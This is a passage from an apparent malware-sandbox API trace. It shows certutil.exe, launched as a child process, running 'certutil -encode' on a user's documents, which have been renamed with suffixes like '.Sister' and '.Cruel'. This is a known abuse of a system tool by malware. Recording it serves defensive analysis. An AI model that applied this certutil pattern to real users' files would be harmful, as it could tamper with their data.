uBytes=0x10) returned 0x2435cbbba20 [0308.366] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x2435cbbba20, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0308.366] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2435cbbddc0 [0308.366] _vsnwprintf (in: _Buffer=0x2435cbbddc0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x7b9199fa08 | out: _Buffer="10.0.15063.447 retail") returned 21 [0308.366] LocalFree (hMem=0x2435cbbba20) returned 0x0 [0308.366] LocalFree (hMem=0x2435cbbde00) returned 0x0 [0308.366] LocalFree (hMem=0x2435cbbe180) returned 0x0 [0308.366] LocalFree (hMem=0x2435cbbddc0) returned 0x0 [0308.366] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0308.366] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0308.366] GetStockObject (i=0) returned 0x900010 [0308.366] RegisterClassW (lpWndClass=0x7b9199fb30) returned 0xc1a2 [0308.367] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x2e02c8 [0308.388] NtdllDefWindowProc_W () returned 0x0 [0308.389] NtdllDefWindowProc_W () returned 0x1 [0308.395] NtdllDefWindowProc_W () returned 0x0 [0308.407] UpdateWindow (hWnd=0x2e02c8) returned 1 [0308.407] PostMessageW (hWnd=0x2e02c8, Msg=0x400, wParam=0x0, lParam=0x2435cba217e) returned 1 [0308.407] GetMessageW (in: lpMsg=0x7b9199fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x7b9199fb80) returned 1 [0308.407] TranslateMessage (lpMsg=0x7b9199fb80) returned 0 [0308.407] DispatchMessageW (lpMsg=0x7b9199fb80) returned 0x0 [0308.407] NtdllDefWindowProc_W () returned 0x0 [0308.407] GetMessageW (in: lpMsg=0x7b9199fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x7b9199fb80) returned 1 [0308.407] TranslateMessage (lpMsg=0x7b9199fb80) returned 0 [0308.407] DispatchMessageW (lpMsg=0x7b9199fb80) returned 0x0 [0308.408] LocalAlloc (uFlags=0x0, uBytes=0x96) returned 0x2435cbaf370 [0308.408] LocalAlloc (uFlags=0x0, uBytes=0xa2) returned 0x2435cba4450 [0308.408] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0308.408] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0308.408] SetLastError (dwErrCode=0x80070716) [0308.408] _vsnwprintf (in: _Buffer=0x7b9199f588, _BufferCount=0xb, _Format="%d", _ArgList=0x7b9199f578 | out: _Buffer="465") returned 3 [0308.408] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0x7b9199f340, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0308.408] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x2435cbabe00 [0308.409] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0308.409] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0308.409] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0x7b9199f320, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0308.409] GetLastError () returned 0xcb [0308.409] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0308.409] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0308.409] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0308.409] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0308.409] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0308.409] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0308.410] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0308.410] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0308.410] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0308.410] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0308.410] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0308.410] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0308.410] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0308.410] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0308.410] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0308.410] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0308.410] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0308.410] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0308.410] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0308.410] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0308.410] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0308.411] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0x7b9199efe8 | out: phkResult=0x7b9199efe8*=0x23c) returned 0x0 [0308.411] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x2435cba91a0 [0308.411] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0x7b9199f558, lpData=0x7b9199f588, lpcbData=0x7b9199f550*=0x4 | out: lpType=0x7b9199f558*=0x0, lpData=0x7b9199f588*=0x0, lpcbData=0x7b9199f550*=0x4) returned 0x2 [0308.411] LocalFree (hMem=0x2435cba91a0) returned 0x0 [0308.411] RegCloseKey (hKey=0x23c) returned 0x0 [0308.411] LocalFree (hMem=0x0) returned 0x0 [0308.411] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x2435cbccd40 [0308.426] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0308.426] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0308.427] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0308.427] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0308.427] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0308.427] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0308.427] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0308.427] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0308.427] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0308.427] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0308.427] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0308.427] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0308.427] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0308.427] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0308.427] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0308.428] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0308.428] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x2435cbd17e0 [0308.428] GetComputerNameW (in: lpBuffer=0x2435cbd17e0, nSize=0x7b9199f550 | out: lpBuffer="NQDPDE", nSize=0x7b9199f550) returned 1 [0308.428] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0x7b9199f520 | out: lpBuffer=0x0, nSize=0x7b9199f520) returned 0 [0308.428] GetLastError () returned 0xea [0308.428] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2435cbbb9c0 [0308.428] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x2435cbbb9c0, nSize=0x7b9199f520 | out: lpBuffer="NQdPdE", nSize=0x7b9199f520) returned 1 [0308.429] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0308.432] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x2435cbd1e80, cbCertEncoded=0x791d) returned 0x0 [0308.435] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x2435cbd1e80, cbCrlEncoded=0x791d) returned 0x0 [0308.435] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x2435cbd1e80, cbEncoded=0x791d, dwFlags=0x8000, pDecodePara=0x7b9199f400, pvStructInfo=0x7b9199f490, pcbStructInfo=0x7b9199f484 | out: pvStructInfo=0x7b9199f490, pcbStructInfo=0x7b9199f484) returned 0 [0308.436] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x2435cbd1e80, cbEncoded=0x791d, dwFlags=0x8000, pDecodePara=0x7b9199f400, pvStructInfo=0x7b9199f490, pcbStructInfo=0x7b9199f484 | out: pvStructInfo=0x7b9199f490, pcbStructInfo=0x7b9199f484) returned 0 [0308.436] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x2435cbd1e80, cbEncoded=0x791d, dwFlags=0x8000, pDecodePara=0x7b9199f400, pvStructInfo=0x7b9199f490, pcbStructInfo=0x7b9199f484 | out: pvStructInfo=0x7b9199f490, pcbStructInfo=0x7b9199f484) returned 0 [0308.436] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x2435cbb5690 [0308.446] CryptMsgUpdate (hCryptMsg=0x2435cbb5690, pbData=0x2435cbd1e80, cbData=0x791d, fFinal=1) returned 0 [0308.446] GetLastError () returned 0x8009310b [0308.446] CryptMsgClose (hCryptMsg=0x2435cbb5690) returned 1 [0308.446] GetFileAttributesExW (in: lpFileName="34r863GjrxofmdERZ-U.xlsx.Sister" (normalized: "c:\\users\\fd1hvy\\documents\\34r863gjrxofmderz-u.xlsx.sister"), fInfoLevelId=0x0, lpFileInformation=0x7b9199f4b0 | out: lpFileInformation=0x7b9199f4b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb85ebb0, ftCreationTime.dwHighDateTime=0x1d592c8, ftLastAccessTime.dwLowDateTime=0xdc91b910, ftLastAccessTime.dwHighDateTime=0x1d5ac26, ftLastWriteTime.dwLowDateTime=0xdc91b910, ftLastWriteTime.dwHighDateTime=0x1d5ac26, nFileSizeHigh=0x0, nFileSizeLow=0x791d)) returned 1 [0308.446] _vsnwprintf (in: _Buffer=0x7b9199f4b8, _BufferCount=0xb, _Format="%d", _ArgList=0x7b9199f4a8 | out: _Buffer="359") returned 3 [0308.446] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0x7b9199f270, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0308.446] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x2435cbd1d20 [0308.447] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0308.447] _vsnwprintf (in: _Buffer=0x7b9199e4a0, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0x7b9199f4f8 | out: _Buffer="Input Length = 31005") returned 20 [0308.447] GetFileType (hFile=0x50) returned 0x2 [0308.447] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7b9199e4a0*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x7b9199e454, lpReserved=0x0 | out: lpBuffer=0x7b9199e4a0*, lpNumberOfCharsWritten=0x7b9199e454*=0x14) returned 1 [0308.448] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0308.448] _vsnwprintf (in: _Buffer=0x7b9199e4a0, _BufferCount=0x1ff, _Format="\n", _ArgList=0x7b9199f4f8 | out: _Buffer="\n") returned 1 [0308.448] GetFileType (hFile=0x50) returned 0x2 [0308.449] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7b9199e4a0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x7b9199e454, lpReserved=0x0 | out: lpBuffer=0x7b9199e4a0*, lpNumberOfCharsWritten=0x7b9199e454*=0x1) returned 1 [0308.464] GetFileAttributesExW (in: lpFileName="34r863GjrxofmdERZ-U.xlsx.Cruel" (normalized: "c:\\users\\fd1hvy\\documents\\34r863gjrxofmderz-u.xlsx.cruel"), fInfoLevelId=0x0, lpFileInformation=0x7b9199f4b0 | out: lpFileInformation=0x7b9199f4b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2768fcf, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xe2768fcf, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xe277aa8e, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0xa6c0)) returned 1 [0308.464] _vsnwprintf (in: _Buffer=0x7b9199f4b8, _BufferCount=0xb, _Format="%d", _ArgList=0x7b9199f4a8 | out: _Buffer="361") returned 3 [0308.464] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0x7b9199f270, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0308.464] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x2435cbd1720 [0308.464] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0308.464] _vsnwprintf (in: _Buffer=0x7b9199e4a0, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0x7b9199f4f8 | out: _Buffer="Output Length = 42688") returned 21 [0308.464] GetFileType (hFile=0x50) returned 0x2 [0308.465] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7b9199e4a0*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x7b9199e454, lpReserved=0x0 | out: lpBuffer=0x7b9199e4a0*, lpNumberOfCharsWritten=0x7b9199e454*=0x15) returned 1 [0308.466] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0308.466] _vsnwprintf (in: _Buffer=0x7b9199e4a0, _BufferCount=0x1ff, _Format="\n", _ArgList=0x7b9199f4f8 | out: _Buffer="\n") returned 1 [0308.466] GetFileType (hFile=0x50) returned 0x2 [0308.466] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7b9199e4a0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x7b9199e454, lpReserved=0x0 | out: lpBuffer=0x7b9199e4a0*, lpNumberOfCharsWritten=0x7b9199e454*=0x1) returned 1 [0308.472] LocalFree (hMem=0x2435cbd1e80) returned 0x0 [0308.472] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0308.472] _vsnwprintf (in: _Buffer=0x7b9199f518, _BufferCount=0xb, _Format="%d", _ArgList=0x7b9199f508 | out: _Buffer="2022") returned 4 [0308.472] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0x7b9199f2d0, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0308.472] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x2435cba8b20 [0308.473] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0308.473] _vsnwprintf (in: _Buffer=0x7b9199e500, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0x7b9199f558 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0308.473] GetFileType (hFile=0x50) returned 0x2 [0308.473] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7b9199e500*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0x7b9199e4b4, lpReserved=0x0 | out: lpBuffer=0x7b9199e500*, lpNumberOfCharsWritten=0x7b9199e4b4*=0x31) returned 1 [0308.473] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0308.473] _vsnwprintf (in: _Buffer=0x7b9199e500, _BufferCount=0x1ff, _Format="\n", _ArgList=0x7b9199f558 | out: _Buffer="\n") returned 1 [0308.473] GetFileType (hFile=0x50) returned 0x2 [0308.473] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7b9199e500*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x7b9199e4b4, lpReserved=0x0 | out: lpBuffer=0x7b9199e500*, lpNumberOfCharsWritten=0x7b9199e4b4*=0x1) returned 1 [0308.481] LocalFree (hMem=0x0) returned 0x0 [0308.481] LocalFree (hMem=0x2435cba4450) returned 0x0 [0308.481] LocalFree (hMem=0x2435cbaf370) returned 0x0 [0308.481] SetLastError (dwErrCode=0x80070716) [0308.481] _vsnwprintf (in: _Buffer=0x7b9199f588, _BufferCount=0xb, _Format="%d", _ArgList=0x7b9199f578 | out: _Buffer="511") returned 3 [0308.481] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0x7b9199f340, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0308.481] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x2435cbd1810 [0308.481] PostQuitMessage (nExitCode=0) [0308.481] GetMessageW (in: lpMsg=0x7b9199fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x7b9199fb80) returned 0 [0308.481] LocalFree (hMem=0x2435cbbb9c0) returned 0x0 [0308.482] LocalFree (hMem=0x2435cbd17e0) returned 0x0 [0308.482] LocalFree (hMem=0x0) returned 0x0 [0308.482] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0308.483] GetLastError () returned 0x7e [0308.483] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0308.483] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0308.483] DllMain () returned 0x1 [0308.483] LocalFree (hMem=0x2435cbbbac0) returned 0x0 [0308.484] LocalFree (hMem=0x2435cbabe00) returned 0x0 [0308.484] LocalFree (hMem=0x2435cbd1d20) returned 0x0 [0308.484] LocalFree (hMem=0x2435cbd1720) returned 0x0 [0308.484] LocalFree (hMem=0x2435cba8b20) returned 0x0 [0308.484] LocalFree (hMem=0x2435cbd1810) returned 0x0 [0308.484] LocalFree (hMem=0x2435cbb4300) returned 0x0 [0308.484] LocalFree (hMem=0x2435cbabb30) returned 0x0 [0308.484] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0308.484] GetLastError () returned 0x7e [0308.484] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0308.485] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0308.485] DllMain () returned 0x1 [0308.485] exit (_Code=0) Thread: id = 144 os_tid = 0x664 Process: id = "59" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x1b93d000" os_pid = "0xea0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"Database1.accdb.Sister\" \"Database1.accdb.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Documents\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 145 os_tid = 0xe90 Thread: id = 146 os_tid = 0xa08